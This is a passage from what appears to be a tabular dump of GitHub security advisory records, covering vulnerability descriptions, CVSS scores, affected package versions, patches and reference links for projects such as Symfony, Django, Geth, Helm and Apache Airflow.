'2021-05-28T17:56:25Z', 'nvd_published_at': '2021-05-24T16:15:00Z'}" +1.4.0,GHSA-7r96-8g3x-g36m,2022-01-04T19:36:52Z,2021-06-28T17:16:56Z,,[],Improper Verification of Cryptographic Signature,"### Impact +The `verifyWithMessage` method of `tEnvoyNaClSigningKey` always returns `true` for any signature of a SHA-512 hash matching the SHA-512 hash of the message even if the signature is invalid. + +### Patches +Upgrade to `v7.0.3` immediately to resolve this issue. Since the vulnerability lies within the verification method, the previous signatures are still valid. We highly recommend reverifying any signatures that were previously verified with the vulnerable `verifyWithMessage` method. + +### Workarounds +In `tenvoy.js` under the `verifyWithMessage` method definition within the `tEnvoyNaClSigningKey` class, ensure that the return statement call to `this.verify` ends in `.verified`. For example, the return statement should start with `return this.verify(signed, password).verified && ` instead of `return this.verify(signed, password) && `. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [github.com/TogaTech/tEnvoy](https://github.com/TogaTech/tEnvoy) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'tenvoy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/security/advisories/GHSA-7r96-8g3x-g36m'}, {'type': 'WEB', 'url': 'https://github.com/TogaTech/tEnvoy/commit/a121b34a45e289d775c62e58841522891dee686b'}, {'type': 'PACKAGE', 'url': 'https://github.com/TogaTech/tEnvoy'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T20:14:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-rfcf-m67m-jcrq,2021-10-21T13:55:20Z,2021-06-21T17:03:44Z,,['CVE-2021-32693'],Authentication granted to all firewalls instead of just one,"Description +----------- + +When an application defines multiple firewalls, the authenticated token delivered by one of the firewalls is available to all other firewalls. This can be abused when the application defines different providers for different parts of an application. In such a situation, a user authenticated on one part of the application is considered authenticated on the whole application. + +Resolution +---------- + +We now ensure that the authenticated token is only available for the firewall that generates it. + +The patch for this issue is available [here](https://github.com/symfony/symfony/commit/3084764ad82f29dbb025df19978b9cbc3ab34728) for branch 5.3. + +Credits +------- + +I would like to thank Bogdan, gndk, Paweł Warchoł, Warxcell, and Adrien Lamotte for reporting the issue and Wouter J for fixing the issue. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-rfcf-m67m-jcrq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32693'}, {'type': 'WEB', 'url': 'https://github.com/symfony/security-http/commit/6bf4c31219773a558b019ee12e54572174ff8129'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/3084764ad82f29dbb025df19978b9cbc3ab34728'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/security-http'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/cve-2021-32693-authentication-granted-to-all-firewalls-instead-of-just-one'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-18T20:33:08Z', 'nvd_published_at': '2021-06-17T23:15:00Z'}" +1.4.0,GHSA-4pwq-fj89-6rjc,2022-08-11T17:00:17Z,2021-06-18T18:29:54Z,,['CVE-2020-13944'],Apache Airflow Cross-site Scripting ,"In Apache Airflow < 1.10.12, the `origin` parameter passed to some of the endpoints like `/trigger` and was vulnerable to a XSS exploit.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13944'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/5c2bb7b0b0e717b11f093910b443243330ad93ca'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cdev.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4656959c8ed06c1f6202d89aa4e67b35ad7bdba5a666caff3fea888e@%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r97e1b60ca508a86be58c43f405c0c8ff00ba467ba0bee68704ae7e3e%40%3Cdev.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra8ce70088ba291f358e077cafdb14d174b7a1ce9a9d86d1b332d6367@%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc005f4de9d9b0ba943ceb8ff5a21a5c6ff8a9df52632476698d99432@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/12/11/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/01/2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T17:35:39Z', 'nvd_published_at': '2020-09-17T14:15:00Z'}" +1.4.0,GHSA-g6xv-8q23-w2q3,2021-05-20T16:59:51Z,2021-06-29T18:32:48Z,,['CVE-2014-8682'],SQL Injection in Gogs,"Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.1'}, {'fixed': '0.5.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-8682'}, {'type': 'WEB', 'url': 'https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/98694'}, {'type': 'WEB', 'url': 'https://github.com/gogits/gogs/releases/tag/v0.5.8'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/35238'}, {'type': 'WEB', 'url': 'http://gogs.io/docs/intro/change_log.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/129116/Gogs-Label-Search-Blind-SQL-Injection.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2014/Nov/31'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2014/Nov/33'}, {'type': 'WEB', 'url': 'http://www.exploit-db.com/exploits/35238'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/archive/1/533995/100/0/threaded'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/71187'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:59:51Z', 'nvd_published_at': None}" +1.4.0,GHSA-xw37-57qp-9mm4,2023-02-09T19:40:33Z,2021-06-29T21:14:16Z,,['CVE-2020-26265'],Consensus flaw during block processing in github.com/ethereum/go-ethereum,"### Impact + +A consensus-vulnerability in Geth could cause a chain split, where vulnerable versions refuse to accept the canonical chain. + +### Description + + +A flaw was repoted at 2020-08-11 by John Youngseok Yang (Software Platform Lab), where a particular sequence of transactions could cause a consensus failure. + +- Tx 1: + - `sender` invokes `caller`. + - `caller` invokes `0xaa`. `0xaa` has 3 wei, does a self-destruct-to-self + - `caller` does a `1 wei` -call to `0xaa`, who thereby has 1 wei (the code in `0xaa` still executed, since the tx is still ongoing, but doesn't redo the selfdestruct, it takes a different path if callvalue is non-zero) + +- Tx 2: + - `sender` does a 5-wei call to 0xaa. No exec (since no code). + +In geth, the result would be that `0xaa` had `6 wei`, whereas OE reported (correctly) `5` wei. Furthermore, in geth, if the second tx was not executed, the `0xaa` would be destructed, resulting in `0 wei`. Thus obviously wrong. + +It was determined that the root cause was this [commit](https://github.com/ethereum/go-ethereum/commit/223b950944f494a5b4e0957fd9f92c48b09037ad) from [this PR](https://github.com/ethereum/go-ethereum/pull/19953). The semantics of `createObject` was subtly changd, into returning a non-nil object (with `deleted=true`) where it previously did not if the account had been destructed. This return value caused the new object to inherit the old `balance`: + +```golang +func (s *StateDB) CreateAccount(addr common.Address) { + newObj, prev := s.createObject(addr) + if prev != nil { + newObj.setBalance(prev.data.Balance) + } +} +``` + +It was determined that the minimal possible correct fix was + +```diff ++++ b/core/state/statedb.go +@@ -589,7 +589,10 @@ func (s *StateDB) createObject(addr common.Address) (newobj, prev *stateObject) + s.journal.append(resetObjectChange{prev: prev, prevdestruct: prevdestruct}) + } + s.setStateObject(newobj) +- return newobj, prev ++ if prev != nil && !prev.deleted { ++ return newobj, prev ++ } ++ return newobj, nil +``` + +### Patches + +See above. The fix was included in Geth `v1.9.20` ""Paragade"". + +### Credits + +The bug was found by @johnyangk and reported via bounty@ethereum.org. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) +* Email us at [security@ethereum.org](mailto:security@ethereum.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.4'}, {'fixed': '1.9.20'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-xw37-57qp-9mm4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26265'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/21080'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/21409'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/87c0ba92136a75db0ab2aba1046d4a9860375d6a'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/releases/tag/v1.9.20'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0105'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:15:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-7rg4-266c-jqw6,2022-06-29T20:41:29Z,2021-06-08T20:12:56Z,,['CVE-2021-28055'],Predictable CSRF tokens in centreon/centreon,"An issue was discovered in Centreon-Web in Centreon Platform 20.10.0. The anti-CSRF token generation is predictable, which might allow CSRF attacks that add an admin user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.10.0'}, {'fixed': '20.10.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.04.0'}, {'fixed': '20.04.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.10.0'}, {'fixed': '19.10.23'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.37'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28055'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/9612'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/commit/0261d4b250135eb513fdb7d52ba6fdeb19c6863f'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/commit/626d3fb91cef402df0ebda5a8165d8f45da67c7a'}, {'type': 'PACKAGE', 'url': 'https://github.com/centreon/centreon'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases/tag/19.10.23'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases/tag/2.8.37'}]","{'cwe_ids': ['CWE-330', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T15:18:01Z', 'nvd_published_at': '2021-04-15T19:15:00Z'}" +1.4.0,GHSA-9f46-5r25-5wfm,2021-09-21T14:55:38Z,2021-06-29T03:13:28Z,,['CVE-2021-32708'],Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem,"### Impact + +The whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely. + +The conditions: + +- A user is allowed to supply the path or filename of an uploaded file. +- The supplied path or filename is not checked against unicode chars. +- The supplied pathname checked against an extension deny-list, not an allow-list. +- The supplied path or filename contains a unicode whitespace char in the extension. +- The uploaded file is stored in a directory that allows PHP code to be executed. + +Given these conditions are met a user can upload and execute arbitrary code on the system under attack. + +### Patches + +The unicode whitespace removal has been replaced with a rejection (exception). + +The library has been patched in: +- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32 +- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74 + +### Workarounds + +For 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'league/flysystem'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'league/flysystem'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32708'}, {'type': 'WEB', 'url': 'https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74'}, {'type': 'WEB', 'url': 'https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32'}, {'type': 'PACKAGE', 'url': 'https://github.com/thephpleague/flysystem'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWPTENBYKI2IG47GI4DHAACLNRLTWUR5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RNZSWK4GOMJOOHKLZEOE5AQSLC4DNCRZ/'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/league/flysystem'}]","{'cwe_ids': ['CWE-367'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T18:03:15Z', 'nvd_published_at': '2021-06-24T17:15:00Z'}" +1.4.0,GHSA-hwqm-x785-qh8p,2021-05-12T22:03:39Z,2021-06-23T17:52:33Z,,['CVE-2020-12797'],Incorrect Permission Assignment for Critical Resource in Hashicorp Consul,"HashiCorp Consul and Consul Enterprise failed to enforce changes to legacy ACL token rules due to non-propagation to secondary data centers. Introduced in 1.4.0, fixed in 1.6.6 and 1.7.4.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul/agent/structs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul/agent/structs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12797'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/issues/5606'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/pull/8047'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/commit/98eea08d3ba1b220a14cf6eedf3b6b07ae2795d7'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/blob/v1.6.6/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/blob/v1.7.4/CHANGELOG.md'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T22:03:39Z', 'nvd_published_at': '2020-06-11T20:15:00Z'}" +1.4.0,GHSA-qpxw-6473-ppww,2021-05-25T20:45:01Z,2021-06-22T15:23:04Z,,['CVE-2020-12467'],Session Fixation in Subrion CMS,Subrion CMS 4.2.1 allows session fixation via an alphanumeric value in a session cookie.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'intelliants/subrion'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12467'}, {'type': 'WEB', 'url': 'https://github.com/belong2yourself/vulnerabilities/tree/master/Subrion%20CMS/Session%20Fixation'}]","{'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:45:01Z', 'nvd_published_at': '2020-04-29T21:15:00Z'}" +1.4.0,GHSA-qm57-vhq3-3fwf,2021-05-20T15:13:24Z,2021-06-09T17:14:51Z,,['CVE-2021-32052'],Header injection possible in Django,"In Django 2.2 before 2.2.22, 3.1 before 3.1.10, and 3.2 before 3.2.2 (with Python 3.9.5+), URLValidator does not prohibit newlines and tabs (unless the URLField form field is used). If an application uses values with newlines in an HTTP response, header injection can occur. Django itself is unaffected because HttpResponse prohibits newlines in HTTP headers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.22'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32052'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/e1e81aa1c4427411e3c68facdd761229ffea6f6f'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1944801'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVKYPHR3TKR2ESWXBPOJEKRO2OSJRZUE/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0002/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/may/06/security-releases/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/06/1'}]","{'cwe_ids': ['CWE-79', 'CWE-88'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T18:12:45Z', 'nvd_published_at': '2021-05-06T16:15:00Z'}" +1.4.0,GHSA-599h-8wpj-75xj,2021-05-20T21:24:49Z,2021-06-23T17:23:30Z,,['CVE-2021-23365'],Authentication Bypass in tyk-identity-broker,The package github.com/tyktechnologies/tyk-identity-broker before 1.1.1 are vulnerable to Authentication Bypass via the Go XML parser which can cause SAML authentication bypass. This is because the XML parser doesn’t guarantee integrity in the XML round-trip (encoding/decoding XML data).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tyktechnologies/tyk-identity-broker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23365'}, {'type': 'WEB', 'url': 'https://github.com/TykTechnologies/tyk-identity-broker/pull/147'}, {'type': 'WEB', 'url': 'https://github.com/TykTechnologies/tyk-identity-broker/commit/243092965b0f93a95a14cb882b5b9a3df61dd5c0'}, {'type': 'WEB', 'url': 'https://github.com/TykTechnologies/tyk-identity-broker/commit/46f70420e0911e4e8b638575e29d394c227c75d0'}, {'type': 'WEB', 'url': 'https://github.com/TykTechnologies/tyk-identity-broker/releases/tag/v1.1.1'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMTYKTECHNOLOGIESTYKIDENTITYBROKER-1089720'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:24:49Z', 'nvd_published_at': '2021-04-26T10:15:00Z'}" +1.4.0,GHSA-4ffq-6g62-j4v4,2022-12-13T16:27:53Z,2021-06-16T17:29:43Z,,['CVE-2021-21620'],Cross-Site Request Forgery in the Jenkins Claim plugin,"Claim Plugin 2.18.1 and earlier does not require POST requests for the form submission endpoint assigning claims, resulting in a cross-site request forgery (CSRF) vulnerability. + +This vulnerability allows attackers to change claims. + +Claim Plugin 2.18.2 requires POST requests for the affected HTTP endpoint.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:claim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.18.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21620'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/claim-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-02-24/#SECURITY-2188%20(2)'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T18:25:26Z', 'nvd_published_at': '2021-02-24T16:15:00Z'}" +1.4.0,GHSA-hjfx-8p6c-g7gx,2023-09-04T16:28:23Z,2021-06-08T18:49:20Z,,['CVE-2021-28678'],Insufficient Verification of Data Authenticity in Pillow,"An issue was discovered in Pillow before 8.2.0. For BLP data, BlpImagePlugin did not properly check that reads (after jumping to file offsets) returned data. This could lead to a DoS where the decoder could be run a large number of times on empty data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28678'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377/commits/496245aa4365d0827390bd0b6fbd11287453b3a1'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-28678-fix-blp-dos'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:38:37Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}" +1.4.0,GHSA-fh37-cx83-q542,2021-05-07T21:48:45Z,2021-06-18T18:30:11Z,,['CVE-2021-26697'],Improper Authentication in Apache Airflow,The lineage endpoint of the deprecated Experimental API was not protected by authentication in Airflow 2.0.0. This allowed unauthenticated users to hit that endpoint. This is low-severity issue as the attacker needs to be aware of certain parameters to pass to that endpoint and even after can just get some metadata about a DAG and a Task. This issue only affects Apache Airflow 2.0.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26697'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/21cedff205e7d62675949fda2aa4616d77232b76'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36111262a59219a3e2704c71e97cf84937dae5ba7a1da99499e5d8f9@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re21fec81baea7a6d73b0b5d31efd07cc02c61f832e297f65bb19b519%40%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re21fec81baea7a6d73b0b5d31efd07cc02c61f832e297f65bb19b519@%3Cdev.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re21fec81baea7a6d73b0b5d31efd07cc02c61f832e297f65bb19b519@%3Cusers.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/02/17/2'}]","{'cwe_ids': ['CWE-269', 'CWE-287', 'CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T21:48:45Z', 'nvd_published_at': '2021-02-17T15:15:00Z'}" +1.4.0,GHSA-qq3j-xp49-j73f,2021-05-24T20:57:17Z,2021-06-23T18:14:36Z,,['CVE-2020-4053'],Plugin archive directory traversal in Helm,"The Helm core maintainers have identified an information disclosure +vulnerability in Helm 3.0.0-3.2.3. + +### Impact + +A traversal attack is possible when installing Helm plugins from a tar +archive over HTTP. It is possible for a malicious plugin author to inject a relative +path into a plugin archive, and copy a file outside of the intended directory. + +Traversal Attacks are a form of a Directory Traversal that can be exploited by +extracting files from an archive. The premise of the Directory Traversal +vulnerability is that an attacker can gain access to parts of the file system +outside of the target folder in which they should reside. The attacker can +then overwrite executable files and either invoke them remotely or wait for +the system or user to call them, thus achieving Remote Command Execution on +the victim's machine. The vulnerability can also cause damage by overwriting +configuration files or other sensitive resources, and can be exploited on both +client (user) machines and servers. + +https://snyk.io/research/zip-slip-vulnerability + +### Patches + +This issue has been fixed in Helm 3.2.4 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [the Helm repository](https://github.com/helm/helm/issues) +* For security-specific issues, email us at [cncf-helm-security@lists.cncf.io](mailto:cncf-helm-security@lists.cncf.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/plugin/installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': 